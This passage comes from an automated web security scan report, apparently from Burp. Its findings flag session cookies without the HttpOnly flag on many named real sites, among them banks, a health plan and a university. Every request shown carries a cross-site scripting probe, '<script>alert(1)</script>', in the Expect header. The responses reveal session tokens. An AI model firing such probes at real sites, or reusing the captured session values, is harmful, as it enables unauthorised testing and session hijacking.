<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<
...[SNIP]...

15.51. http://www.mountainwestbank.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mountainwestbank.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mountainwestbank.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: https://www.mountainwestbank.com/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=12233899;expires=Fri, 26-Apr-2041 03:42:38 GMT;path=/
Set-Cookie: CFTOKEN=473cbd88e0a2b90b-3B001DCB-E41F-1378-121C1078F161B5A5;expires=Fri, 26-Apr-2041 03:42:38 GMT;path=/
Set-Cookie: CFID=12233899;path=/
Set-Cookie: CFTOKEN=473cbd88e0a2b90b%2D3B001DCB%2DE41F%2D1378%2D121C1078F161B5A5;path=/
Date: Wed, 04 May 2011 03:42:37 GMT
Content-Length: 2079

<script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath="";
_cf_ajaxscriptsrc="/CFIDE/scripts/ajax
...[SNIP]...

15.52. http://www.musi-c-lips.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.musi-c-lips.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musi-c-lips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:18:37 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e9dadddb41b508b4d0955d0c38a36dd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 279

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...

15.53. http://www.mybusinesslisting.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 4520
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=NBGAHBODDGBJJINKLJFCJOMG; path=/
Cache-control: private

<html>
<head>
<title>favicon.ico Listings (yellow page directory / yellow pages directory) Businesses Category Browsing</title>

<link rel="stylesheet" href="/_css/styles.css" type="text/css" />

...[SNIP]...

15.54. http://www.nobelcom.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nobelcom.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nobelcom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache,max-age=1800
Set-Cookie: JSESSIONID=abcg2Sy5PoJdmaEx9I4_s; domain=.nobelcom.com; path=/
Content-Type: text/html
Date: Wed, 04 May 2011 01:07:42 GMT
Content-Length: 30526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>


   <title>Phone Cards from NobelCom.com for domestic and international use</title>
   <meta name=
...[SNIP]...

15.55. http://www.ocinkjet.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ocinkjet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ocinkjet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:52:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: referer=; expires=Wed, 02-May-2012 04:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQCTBBBAD=FBMMLPAAHCGCECEGPFLJPECK; path=/
Cache-control: private


15.56. http://www.ohioslargestplayground.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ohioslargestplayground.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ohioslargestplayground.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=7916285;expires=Fri, 26-Apr-2041 01:29:08 GMT;path=/
Set-Cookie: CFTOKEN=83200340;expires=Fri, 26-Apr-2041 01:29:08 GMT;path=/
Set-Cookie: CFID=7916285;path=/
Set-Cookie: CFTOKEN=83200340;path=/
Date: Wed, 04 May 2011 01:29:08 GMT
Content-Length: 0


15.57. http://www.phonesale.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.phonesale.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonesale.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 2122
Content-Type: text/html
Expires: Wed, 04 May 2011 01:41:35 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCRCDRQR=MBNPHIJDLEAKOHLDBDEJOHAM; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:41:34 GMT


<!--include virtual="/includes/template/top.asp"-->
<!--include virtual="/includes/asp/inc_CDOsend.asp"-->
<table width="950" border="0" cellspacing="0" cellpadding="0">
<tr>
   <td width=
...[SNIP]...

15.58. http://www.plantdelights.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.plantdelights.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.plantdelights.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42258
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSADCASDB=FOKNBCODECJECPPBIEPGHIJG; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

   <base href="http://www.plantdelights
...[SNIP]...

15.59. http://www.publicus.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.publicus.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.publicus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Wed, 04 May 2011 02:47:05 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSPERMUSERID=173426082025327; path=/; expires=Wed, 02 May 2012 22:47:05 GMT
Set-Cookie: PBCSSESSIONID=173426082025327; path=/
X-Passed-To: SXWEB13, URL Rewrite on site N/A (2011-05-03 22:47:05:187)
X-Handled-By: SXWEB13, Rewrite on site N/A
X-Actual-URL: SXWEB13, (/favicon.ico)
X-Passed-To-DLL: SXWEB13, (2011-05-03 22:47:05:202)
X-Passed-To-BeforeDispatch: SXWEB13, on site XH (2011-05-03 22:47:05:234)
X-Returned-From-BeforeDispatch: SXWEB13, on site XH (2011-05-03 22:47:05:421)
X-Passed-To-PostProcessResponse: SXWEB13, on site XH (2011-05-03 22:47:05:562)
X-Returned-From-PostProcessResponse: SXWEB13, on site XH (2011-05-03 22:47:05:562)
X-Returned-From-DLL: SXWEB13 (2011-05-03 22:47:05:562)
X-Returned-From: SXWEB13(2011-05-03 22:47:05:562)
Date: Wed, 04 May 2011 02:47:05 GMT
X-Cache: MISS from sxsquid04
X-Cache-Lookup: MISS from sxsquid04:80
Via: 1.0 sxsquid04 (squid/3.0.STABLE18)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Untitled</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF">
Couldn't find mapping for /favicon.ico and no default error
...[SNIP]...

15.60. http://www.pull-ups.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pull-ups.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pull-ups.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie:WEBTRENDS_ID=173.193.214.243-781955072.30149118; expires=Thu, 03-May-2012 01:54:19 GMT; path=/
Date: Wed, 04 May 2011 01:54:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1635
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQRADBQD=JOGNHEODICNLDJPKCFGHFMGB; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.61. http://www.rsdynamic.ru/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.rsdynamic.ru
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rsdynamic.ru
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Server: nginx/0.7.64
Date: Wed, 04 May 2011 03:07:42 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=htfpicpl962pg8e2m9kpaquvj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.redstream.ru/favicon.ico
Content-Length: 0


15.62. http://www.saasdir.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.saasdir.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.saasdir.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 01:15:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.saasdir.com/404.aspx
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSDSACRD=CCCEDFNDPMMHAMAIKKFJIJMO; path=/
Cache-control: private


15.63. http://www.sdstate.edu/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sdstate.edu
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sdstate.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=3830bd38f3aaf691ddd1673b453835a1a442;path=/
Set-Cookie: JSESSIONID=3830bd38f3aaf691ddd1673b453835a1a442;expires=Sat, 14-May-2011 03:21:42 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...

15.64. http://www.sepw.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sepw.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sepw.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:05:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=4htfdd45hxysu455j1tk3yem; path=/
Set-Cookie: Referer=; path=/
Set-Cookie: HttpReferer=; path=/
Set-Cookie: RightColumnNav1:CartList1=1; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Small Engine Parts Warehouse - Error Page</title>
       <meta content="Microsoft Visual Studio.NET 7.0" name="G
...[SNIP]...

15.65. http://www.smiletrain.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.smiletrain.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smiletrain.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Set-Cookie: JSESSIONID=abcvVf75aOpSQ9vsiH4_s; path=/
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 00:59:43 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3745525d5f4f58455e445a4a4214f4;expires=Wed, 04-May-2011 01:59:43 GMT;path=/;httponly
Content-Length: 222


<html>
<head>
<title>File Not Found</title>
</head>

<body>

<h1>File Not Found</h1>

Sorry, the requested page was not found. Please try again.

<p>Original URI: /favicon.ico</
...[SNIP]...

15.66. http://www.stellarone.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stellarone.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stellarone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=10565873;expires=Fri, 26-Apr-2041 01:25:29 GMT;path=/
Set-Cookie: CFTOKEN=46a28e1113ba3a06-3618A20A-E41F-1378-0BDCAF893237AA9E;expires=Fri, 26-Apr-2041 01:25:29 GMT;path=/
Set-Cookie: BROWSEROPEN=yes;path=/
Date: Wed, 04 May 2011 01:25:29 GMT
Content-Length: 8972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/inte
...[SNIP]...

15.67. http://www.tableclothsfactory.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tableclothsfactory.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tableclothsfactory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:22:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARRSSAA=NPJGPOODFCJKFPJOCJKAAKMG; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.68. http://www.teacherjobnet.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.teacherjobnet.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teacherjobnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 00:52:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://www.teacherjobnet.org/favicon.ico
Content-Length: 162
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQADBTBSS=FIELOGODGMOOBBJMNLIPMCCM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.teacherjobnet.org/favicon.ico">here</a>.</body>

15.69. http://www.tel3advantage.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tel3advantage.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tel3advantage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8E1EA24A9F496788BE2D46CE7F33678; Path=/
Set-Cookie: CRID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ETag: W/"894-1234889386376"
Last-Modified: Tue, 17 Feb 2009 16:49:46 GMT
Content-Length: 894
Date: Wed, 04 May 2011 02:03:10 GMT

..............h.......(....... .......................................E.^.._.....................................M..O..Q...`........................*.........j0.J..L..N............................*..
...[SNIP]...

15.70. http://www.theamericanmonk.com/members/forgot-password  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.theamericanmonk.com
Path:   /members/forgot-password

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/forgot-password HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:07 GMT
Server: Apache
Set-Cookie: PHPSESSID=64df9697db56d868d7731608c49e8271; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 5895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...

15.71. http://www.thehealthplan.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thehealthplan.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehealthplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2007.11.07T08:52-0500" exp "2007.11.07T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Set-Cookie: CFID=13104831;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: CFTOKEN=27842674;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: JSESSIONID=9430fb20c9531d41550077445351f367c726;path=/
Set-Cookie: COOKIESENABLED=true;expires=Thu, 05-May-2011 04:16:44 GMT;path=/
Set-Cookie: TLTSID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com
Set-Cookie: TLTUID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com expires=Wed, 04-05-2021 04:16:44 GMT
Date: Wed, 04 May 2011 04:16:44 GMT
Connection: close

           
                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...

15.72. http://www.thescriptmusic.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thescriptmusic.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thescriptmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 04 May 2011 03:31:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=9a8c5b5ef3cbdef0018aed7e260057e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
X-Cache: MISS from bmg-nweb5
X-Cache-Lookup: HIT from bmg-nweb5:80
Via: 1.0 bmg-nweb5:80 (squid)
Connection: keep-alive


15.73. http://www.thirdworldpass.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thirdworldpass.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thirdworldpass.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97A5B6A49C12A711A9378E2FE96BFD1E; Path=/
Location: http://www.thirdworldpass.com/free-porn-tube/
Content-Type: text/html
Date: Wed, 04 May 2011 01:59:23 GMT
Content-Length: 0


15.74. http://www.usairwayscruises.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usairwayscruises.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usairwayscruises.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 03:21:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Location: /images_unique/blank.gif
Content-Length: 145
Content-Type: text/html
Set-Cookie: WDVID=%7BB04F6624%2DEAEA%2D4164%2D8346%2D4EF9A68E29F0%7D; path=/
